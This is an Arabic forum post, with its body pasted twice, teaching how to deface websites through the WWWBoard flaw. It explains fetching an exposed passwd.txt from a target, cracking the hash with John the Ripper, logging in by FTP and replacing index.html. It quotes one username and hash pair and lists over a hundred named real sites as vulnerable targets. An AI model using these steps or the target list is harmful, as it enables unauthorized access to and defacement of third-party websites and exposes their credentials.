assadabojlay
04-18-2013, 01:00 AM
أولا وقبل كل شي أرجوا عدم استخدام الثغرة فيما يخل بالإسلام وفيما حرمه الله
الآن نبدأ الحديث هذه الثغرة الظاهر طرحت من قبل هنا
ولكنني أعيدها لانها محفوظة عندي من زمااااااان وأحببت أن تبقى الملكية لصاحبها
========================
ثغرة الـWWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE
كلمة المرور:إسم المستخدم
يعني إسم المستخدم هو cknouse
وكلمة المرور هيaexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الذي تم شرحه بالعنوان التالي
http://www.3asfh.com/vb/showthread.php?s=&threadid=653
الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html
وإرفعها للموقع
لتحميل الفتب
http://www.motken.com/dawnload/porogram/wsftppro.zip
للتطبيق
هذه مواقع مصابة بالثغرة
http://members.mint.net/raske/wwwboard/passwd.txt
http://www.avatar-moving.com/kb/wwwboard/passwd.txt
http://espa.virtualave.net/wwwboard/passwd.txt
http://www.dsg-art.com/wwwboard/passwd.txt
http://www.derby.gov.uk/dcc/wwwboard/passwd.txt
http://www.dsg-art.com/wwwboard/passwd.txt
http://www.frebend.com/wwwboard/passwd.txt
http://www.efn.org/~dalep/wwwboard/passwd.txt
http://kidlink.sunet.se/rti/irc/wwwboard/passwd.txt
http://www.hillsidespca.com/wwwboard/passwd.txt
http://www.lionnet.org.tr/118u/wwwboard/passwd.txt
http://www.cytoskeleton.com/wwwboard/passwd.txt
http://www.locon.org/wwwboard/passwd.txt
http://www.kcftoa.org/hazmat/wwwboard/passwd.txt
http://www.boardprep.net/wwwboard/passwd.txt
http://www.wgbhalumni.org/wwwboard/passwd.txt
http://www.creative-design.de/kmt/wwwboard/passwd.txt
http://www.kaapeli.fi/~hekata/wwwboard/passwd.txt
http://www.wbref.ch/wwwboard/passwd.txt
http://www.fys.ku.dk/~voss/utopia/wwwboard/passwd.txt
http://www.awdansey.co.uk/wwwboard/passwd.txt
http://www.mpset.com/wwwboard/passwd.txt
http://www.selectfire.com/wwwboard/passwd.txt
http://www.climbnh.com/wwwboard/passwd.txt
http://cwww.com/wwwboard/passwd.txt
http://sitemanager.hypermart.net/wwwboard/passwd.txt
http://www.foxsden.org/psf/FFE/wwwboard/passwd.txt
http://expert.cc.purdue.edu/~pumsan/wwwboard/passwd.txt
http://wrm.hre.ntou.edu.tw/wrm/wwwboard/passwd.txt
http://www.radiocollege.org/rc/wwwboard/passwd.txt
http://www.firstfives.org/wwwboard/passwd.txt
http://www.adtelfree.com/wwwboard/passwd.txt
http://www.as.ua.edu/arcca/wwwboard/passwd.txt
http://students.cs.byu.edu/~quixote/wwwboard/passwd.txt
http://www.netset.com/~jdennis/wwwboard/passwd.txt
http://www.rit.edu/~jrd4663/cgi-bin/wwwboard/passwd.txt
http://www.i-55.com/andersoninc/wwwboard/passwd.txt
http://www.tiberigroup.com/wwwboard/passwd.txt
http://peakpits.com/wwwboard/passwd.txt
http://www.cjns.com/cyb/cyberair/wwwboard/passwd.txt
http://www.konzert777.de/wwwboard/passwd.txt
http://www.socalhoops.tierranet.com/wwwboard/passwd.txt
http://www.nwlink.com/~nickguy/wwwboard/passwd.txt
http://aasbd.org/wwwboard/passwd.txt
http://ftp.duth.gr/pub/netlib/utk/wwwboard/passwd.txt
http://www.freelance-street.co.uk/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://www.rireformparty.com/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://www.rireformparty.com/wwwboard/passwd.txt
http://www.clearlight.com/~brawicz/wwwboard/passwd.txt
http://www.fgm.org/wwwboard/passwd.txt
http://www.chatrap.com/wwwboard/passwd.txt
http://www.kaibutsu-thx.com/cx/htm/wwwboard/passwd.txt
http://camineros.com/wwwboard/passwd.txt
http://www.offroadexchange.com/wwwboard/passwd.txt
http://www.boren.org/wwwboard/passwd.txt
http://crux.baker.edu/myeake01/wwwboard/passwd.txt
http://207.65.96.29/users/akira/wwwboard/passwd.txt
http://www.n2creative.com/wwwboard/password.txt
http://hkbne.virtualave.net/wwwboard/password.txt
http://www.glowinthedarkpaint.com/wwwboard/passwd.txt
http://www.mathpuzzle.com/wwwboard/passwd.txt
http://gybe.com/boggy/swallowtails/wwwboard/passwd.txt
http://idchiro.org/wwwboard/passwd.txt
http://www.thousandfootkrutch.com/wwwboard/passwd.txt
http://uniteddesigngroup.com/wwwboard/passwd.txt
http://www.dawave.com/wwwboard/passwd.txt
http://www.acnetreatment.com/wwwboard/passwd.txt
http://pepup.hypermart.net/wwwboard/passwd.txt
http://gbsystems.com/wwwboard/passwd.txt
http://www.indieport.com/wwwboard/passwd.txt
http://www.utexas.edu/depts/asih/wwwboard/passwd.txt
http://hemi.ps.tsoa.nyu.edu/webchat/passwd.txt
http://www.stenum.at/euinfo/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://students.washington.edu/msa/waami/passwd.txt
http://member.mfea.com/Members/bbs/admin/passwd.txt
http://ais.gmd.de/~sylla/Archive/passwd.txt
http://www.notam.com/forum/passwd.txt
http://www.sandiego.edu/~deroche/group4p/passwd.txt
http://www.sandiego.edu/~deroche/case7/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://indianlake.com/cgibin/passwd.txt
http://www.swe.org/SWE/Convention/den01/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://dykesworld.de/Boards/sistah/passwd.txt
http://www.public.iastate.edu/~n2ddg/IE565/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.defenders.by.ru/texts/unix/unix-passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.unionmen.com/forum/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt
http://ponce.inter.edu/forums/passwd.txt
http://students.washington.edu/msa/curriculum/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.motosalvagedirectory.com/forums/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.inece.org/ozone/passwd.txt
http://cds.unina.it/~tuccillo/passwd.txt
http://ponce.inter.edu/forums/prueba/passwd.txt
http://paradigm-dc.hypermart.net/passwd.txt
http://clonetheory.virtualave.net/passwd.txt
http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt
http://www.artintheschool.org/forum/passwd.txt
http://www.mag7.net/floor/passwd.txt
http://www.urban-forestry.com/forum/passwd.txt
الله يا كثرها فك التشفير واشتغل
بس تراها تأخذ وقت طويييييل احيانا في فك التشفير
واذا كان عندك موقع تبي تتأكد أنه مصاب بالثغرة أو لا
تفضل هذا الموقع فهو يعطيك بيانات عن الموقع
http://www.netcraft.com
الآن نبدأ الحديث هذه الثغرة الظاهر طرحت من قبل هنا
ولكنني أعيدها لانها محفوظة عندي من زمااااااان وأحببت أن تبقى الملكية لصاحبها
========================
ثغرة الـWWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE
كلمة المرور:إسم المستخدم
يعني إسم المستخدم هو cknouse
وكلمة المرور هيaexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الذي تم شرحه بالعنوان التالي
http://www.3asfh.com/vb/showthread.php?s=&threadid=653
الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html
وإرفعها للموقع
لتحميل الفتب
http://www.motken.com/dawnload/porogram/wsftppro.zip
للتطبيق
هذه مواقع مصابة بالثغرة
http://members.mint.net/raske/wwwboard/passwd.txt
http://www.avatar-moving.com/kb/wwwboard/passwd.txt
http://espa.virtualave.net/wwwboard/passwd.txt
http://www.dsg-art.com/wwwboard/passwd.txt
http://www.derby.gov.uk/dcc/wwwboard/passwd.txt
http://www.dsg-art.com/wwwboard/passwd.txt
http://www.frebend.com/wwwboard/passwd.txt
http://www.efn.org/~dalep/wwwboard/passwd.txt
http://kidlink.sunet.se/rti/irc/wwwboard/passwd.txt
http://www.hillsidespca.com/wwwboard/passwd.txt
http://www.lionnet.org.tr/118u/wwwboard/passwd.txt
http://www.cytoskeleton.com/wwwboard/passwd.txt
http://www.locon.org/wwwboard/passwd.txt
http://www.kcftoa.org/hazmat/wwwboard/passwd.txt
http://www.boardprep.net/wwwboard/passwd.txt
http://www.wgbhalumni.org/wwwboard/passwd.txt
http://www.creative-design.de/kmt/wwwboard/passwd.txt
http://www.kaapeli.fi/~hekata/wwwboard/passwd.txt
http://www.wbref.ch/wwwboard/passwd.txt
http://www.fys.ku.dk/~voss/utopia/wwwboard/passwd.txt
http://www.awdansey.co.uk/wwwboard/passwd.txt
http://www.mpset.com/wwwboard/passwd.txt
http://www.selectfire.com/wwwboard/passwd.txt
http://www.climbnh.com/wwwboard/passwd.txt
http://cwww.com/wwwboard/passwd.txt
http://sitemanager.hypermart.net/wwwboard/passwd.txt
http://www.foxsden.org/psf/FFE/wwwboard/passwd.txt
http://expert.cc.purdue.edu/~pumsan/wwwboard/passwd.txt
http://wrm.hre.ntou.edu.tw/wrm/wwwboard/passwd.txt
http://www.radiocollege.org/rc/wwwboard/passwd.txt
http://www.firstfives.org/wwwboard/passwd.txt
http://www.adtelfree.com/wwwboard/passwd.txt
http://www.as.ua.edu/arcca/wwwboard/passwd.txt
http://students.cs.byu.edu/~quixote/wwwboard/passwd.txt
http://www.netset.com/~jdennis/wwwboard/passwd.txt
http://www.rit.edu/~jrd4663/cgi-bin/wwwboard/passwd.txt
http://www.i-55.com/andersoninc/wwwboard/passwd.txt
http://www.tiberigroup.com/wwwboard/passwd.txt
http://peakpits.com/wwwboard/passwd.txt
http://www.cjns.com/cyb/cyberair/wwwboard/passwd.txt
http://www.konzert777.de/wwwboard/passwd.txt
http://www.socalhoops.tierranet.com/wwwboard/passwd.txt
http://www.nwlink.com/~nickguy/wwwboard/passwd.txt
http://aasbd.org/wwwboard/passwd.txt
http://ftp.duth.gr/pub/netlib/utk/wwwboard/passwd.txt
http://www.freelance-street.co.uk/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://www.rireformparty.com/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://www.rireformparty.com/wwwboard/passwd.txt
http://www.clearlight.com/~brawicz/wwwboard/passwd.txt
http://www.fgm.org/wwwboard/passwd.txt
http://www.chatrap.com/wwwboard/passwd.txt
http://www.kaibutsu-thx.com/cx/htm/wwwboard/passwd.txt
http://camineros.com/wwwboard/passwd.txt
http://www.offroadexchange.com/wwwboard/passwd.txt
http://www.boren.org/wwwboard/passwd.txt
http://crux.baker.edu/myeake01/wwwboard/passwd.txt
http://207.65.96.29/users/akira/wwwboard/passwd.txt
http://www.n2creative.com/wwwboard/password.txt
http://hkbne.virtualave.net/wwwboard/password.txt
http://www.glowinthedarkpaint.com/wwwboard/passwd.txt
http://www.mathpuzzle.com/wwwboard/passwd.txt
http://gybe.com/boggy/swallowtails/wwwboard/passwd.txt
http://idchiro.org/wwwboard/passwd.txt
http://www.thousandfootkrutch.com/wwwboard/passwd.txt
http://uniteddesigngroup.com/wwwboard/passwd.txt
http://www.dawave.com/wwwboard/passwd.txt
http://www.acnetreatment.com/wwwboard/passwd.txt
http://pepup.hypermart.net/wwwboard/passwd.txt
http://gbsystems.com/wwwboard/passwd.txt
http://www.indieport.com/wwwboard/passwd.txt
http://www.utexas.edu/depts/asih/wwwboard/passwd.txt
http://hemi.ps.tsoa.nyu.edu/webchat/passwd.txt
http://www.stenum.at/euinfo/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://students.washington.edu/msa/waami/passwd.txt
http://member.mfea.com/Members/bbs/admin/passwd.txt
http://ais.gmd.de/~sylla/Archive/passwd.txt
http://www.notam.com/forum/passwd.txt
http://www.sandiego.edu/~deroche/group4p/passwd.txt
http://www.sandiego.edu/~deroche/case7/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://indianlake.com/cgibin/passwd.txt
http://www.swe.org/SWE/Convention/den01/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://dykesworld.de/Boards/sistah/passwd.txt
http://www.public.iastate.edu/~n2ddg/IE565/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.defenders.by.ru/texts/unix/unix-passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.unionmen.com/forum/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt
http://ponce.inter.edu/forums/passwd.txt
http://students.washington.edu/msa/curriculum/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.motosalvagedirectory.com/forums/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.inece.org/ozone/passwd.txt
http://cds.unina.it/~tuccillo/passwd.txt
http://ponce.inter.edu/forums/prueba/passwd.txt
http://paradigm-dc.hypermart.net/passwd.txt
http://clonetheory.virtualave.net/passwd.txt
http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt
http://www.artintheschool.org/forum/passwd.txt
http://www.mag7.net/floor/passwd.txt
http://www.urban-forestry.com/forum/passwd.txt
الله يا كثرها فك التشفير واشتغل
بس تراها تأخذ وقت طويييييل احيانا في فك التشفير
واذا كان عندك موقع تبي تتأكد أنه مصاب بالثغرة أو لا
تفضل هذا الموقع فهو يعطيك بيانات عن الموقع
http://www.netcraft.com